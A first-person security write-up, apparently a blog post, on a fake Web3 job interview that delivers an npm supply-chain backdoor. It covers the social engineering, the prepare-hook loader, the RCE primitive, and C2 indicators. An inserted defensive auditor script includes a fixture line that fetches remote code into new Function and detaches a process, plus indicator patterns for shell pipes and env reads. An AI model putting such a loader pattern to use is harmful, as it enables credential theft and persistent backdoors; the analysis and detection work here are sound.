Last updated: 2026-04-19
Status: C2 active / repository still up / reports pending

TL;DR — I was targeted by a supply chain attack during what looked like a legitimate Web3 job interview. npm install on the repository they asked me to clone silently spawned a background Node process that exfiltrated my entire environment and opened a persistent TCP backdoor to an attacker-controlled server in Texas. This post reverse-engineers the full attack chain: the social engineering layer, the three-stage loader, the new Function("require", response.data) RCE primitive, the two separate C2 endpoints (Vercel loader → custom TCP beacon on port 1224), and the full polling protocol — reproduced and captured in an isolated Hetzner VM with tcpdump, Docker, and tshark stream analysis. Includes IoCs, a defensive guide, and the complete repository snapshot preserved for researchers.

Repository analyzed: github.com/0G-Labs-IO/MGVerse — impersonating the legitimate 0G Labs. Snapshot archived in case it's taken down.

Key facts
- Entry vector: npm prepare hook
- RCE primitive: new Function("require", response.data)
- Stage 1: Vercel loader (ipcheck-six.vercel.app)
- Stage 2: TCP C2 (216.250.249.176:1224)
- Exfiltration: full process.env
- Campaign tag: tid=Y3Jhc2ggdGhlIGJhZCBndXlz

Contents
- Context
- The social engineering layer
- High-level attack chain
- Stage 1 — The prepare lifecycle hook
- Stage 2 — Background execution
- Stage 3 — The RCE primitive
- Decoding the first-stage endpoint
- The sandbox setup — reproducing the attack safely
- Reverse-engineering the C2 protocol
- Infrastructure analysis
- What the attacker sees, what they can do
- Git forensics — attributing the malicious commits
- Indicators of Compromise (IoCs)
- Defensive guide
- Incident response playbook
- Related campaigns and prior art
- Reporting
- Future work
- Appendix: the malicious code in full

1. Context

Supply chain attacks on developers have moved past the classic "typosquat on npm" pattern.
The newer, more targeted variant works through social engineering:
- A recruiter on LinkedIn or Telegram contacts a developer with a plausible Web3 job offer
- After a friendly intro call, a "hiring manager" asks the candidate to clone and run a take-home repo — live, on a screen share
- The repo looks legitimate: mainstream dependencies, plausible README, working frontend
- During npm install, a hidden payload executes
- Credentials, SSH keys, browser cookies, crypto wallet data, and .env files become accessible to the attacker

The social pressure of a live interview is the critical vector. You don't have time to audit the repo. You're sharing your screen. You want to impress, so you run npm install.

I got targeted by exactly this. During the session I felt something was off — the interviewer kept pushing me to run the code while asking about my projects and websites. I ran npm install in a working directory that didn't contain sensitive secrets (no SSH agent loaded, no wallet seeds on disk in that context), caught the background process ~44 minutes later in ps aux, killed it, and went into full incident response mode. That was the first hour.

What follows is the second hour onward: I set up an isolated Hetzner VM specifically to reproduce the attack safely, captured every packet, and reverse-engineered the complete C2 protocol. This is the full forensic write-up.

2. The social engineering layer

The technical payload is almost trivial compared to the elaborate social engineering.
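Since the payload is the trivial part, the defensive check for it is correspondingly simple. The Node script below is an added example, not code from the original post, from the MGVerse repository, or from 0G Labs: it audits a cloned repository's package.json for the lifecycle scripts npm runs on its own during install (prepare included, which is the entry vector named in the key facts), scans any local script file a hook invokes, and flags constructs such as new Function(), detached child processes and network I/O. The indicator list, the hook-to-file resolution, and the sample package and script are constructed for this example; a clean report means "nothing matched", not "safe".

```javascript
// Added example, not code from the original post or from the repository it
// analyzes. Audits a package.json for npm lifecycle scripts that run on their
// own during `npm install` and flags constructs worth reading by hand before
// anyone installs. Heuristic only: a clean report is not proof of safety.

// Hooks npm runs automatically on `npm install` (prepublish is the legacy one).
const INSTALL_HOOKS = [
  "preinstall", "install", "postinstall",
  "preprepare", "prepare", "postprepare", "prepublish",
];

// Indicators chosen for this example (assumed, not from the post): a regex over
// the script text and the reason a reviewer should care.
const INDICATORS = [
  [/\bnew\s+Function\s*\(/, "builds code at runtime with new Function()"],
  [/\beval\s*\(/, "eval() on runtime data"],
  [/child_process|\bspawn\s*\(|\bexec(?:Sync)?\s*\(/, "starts a child process"],
  [/detached\s*:\s*true|\.unref\s*\(\s*\)/, "detaches a process so it outlives the installer"],
  [/https?:\/\/|\baxios\b|\bfetch\s*\(/, "performs network I/O during install"],
  [/process\.env\b/, "reads the environment (credential exposure)"],
  [/\bnode\s+(?:-e|--eval)\b/, "inline node -e payload in the hook command"],
  [/\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b/, "pipes a download into a shell"],
  [/\bbase64\b|\batob\s*\(/, "base64 decoding, often used to hide strings"],
];

function matchIndicators(text) {
  return INDICATORS.filter(([re]) => re.test(text)).map(([, why]) => why);
}

// Local script files a hook command invokes, e.g. "node scripts/init.js".
function referencedScripts(command) {
  const re = /(?:node|sh|bash)\s+(\.?\/?[\w./-]+\.(?:js|cjs|mjs|sh))\b/g;
  return [...command.matchAll(re)].map((m) => m[1].replace(/^\.\//, ""));
}

// pkg: parsed package.json; files: map of repo-relative path -> file content,
// so the scripts a hook points at are scanned too. Returns one finding per hook.
function auditPackage(pkg, files = {}) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const reasons = matchIndicators(command);
    const referenced = referencedScripts(command);
    for (const rel of referenced) {
      const body = files[rel];
      if (body === undefined) {
        reasons.push(`${rel}: referenced script not present in the snapshot`);
        continue;
      }
      for (const why of matchIndicators(body)) reasons.push(`${rel}: ${why}`);
    }
    findings.push({
      hook, command, referenced,
      reasons: [...new Set(reasons)],
      // Any install-time hook deserves a look; matched indicators make it urgent.
      risk: reasons.length ? "high" : "review",
    });
  }
  return findings;
}

// Constructed fixture modelled on the loader shape the post describes: a prepare
// hook running a local script that fetches code, runs it via new Function, and
// detaches itself from the install. Nothing here executes; it is scanned as text.
const SAMPLE_PKG = {
  name: "sample-takehome",
  scripts: { dev: "next dev", build: "next build", prepare: "node scripts/init.js" },
};
const SAMPLE_FILES = {
  "scripts/init.js": [
    'const { spawn } = require("child_process");',
    'const axios = require("axios");',
    'axios.get("https://loader.example.invalid/").then((r) => new Function("require", r.data)(require));',
    'spawn(process.execPath, [__filename], { detached: true, stdio: "ignore" }).unref();',
  ].join("\n"),
};
// A typical benign prepare hook, for contrast.
const BENIGN_PKG = { name: "clean", scripts: { prepare: "husky install" } };

function report(findings) {
  if (!findings.length) return "no install-time lifecycle hooks";
  return findings
    .map((f) => `[${f.risk}] ${f.hook}: ${f.command}` + f.reasons.map((r) => `\n    - ${r}`).join(""))
    .join("\n");
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(report(auditPackage(SAMPLE_PKG, SAMPLE_FILES)));
  console.log(report(auditPackage(BENIGN_PKG)));
}

if (typeof module !== "undefined") {
  module.exports = { auditPackage, matchIndicators, referencedScripts, report, SAMPLE_PKG, SAMPLE_FILES, BENIGN_PKG };
}
```

Run it against a checkout before installing, and when the repository comes from a party you cannot vouch for, install with `npm install --ignore-scripts` (or set `npm config set ignore-scripts true`) regardless of what the report says: lifecycle hooks then do not run at all, and a legitimate prepare step can be invoked by hand once the scripts have been read.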
The attackers operate across multiple coordinated touchpoints:
- LinkedIn profile impersonating a recruiter — real-looking activity, connections, a plausible company behind them
- Calendly link pointing to a "hiring manager" Google Calendar that's not obviously fake
- Google Meet interview with someone pretending to be a CTO or technical lead — in my case with a distinct Chinese accent
- A GitHub org whose name is visually similar to a legitimate company (0G-Labs-IO vs the real 0glabs / 0gfoundation)
- A cover story — they're "building on top of" a well-known funded protocol, claim traction, show a working demo

The pitch documentation was equally polished. The recruiter shared a Google Doc titled "0G Labs - Hire" (docs.google.com/document/d/1SM0wVMyi-...) containing a fake company overview, descriptions of two projects ("MGVerse" and "ZeroScope"), a detailed organizational values section, and a full salary table listing 15 roles from "Fractional CTO" ($250K–$280K) to "DevOps Engineer" ($130K–$170K). The document used the real 0G Labs branding and accurately described their actual product (deAIOS, modular blockchain, DA layer) — all sourced from the real company's public materials. The Calendly booking link was calendly.com/0glabs/interview, using the real company's name as the Calendly slug.

In my case, the real 0G Labs is a legitimate San Francisco company with hundreds of millions in raised funding building decentralized AI infrastructure. The attackers set up github.com/0G-Labs-IO (note the -IO suffix that makes it look like a subsidiary or too...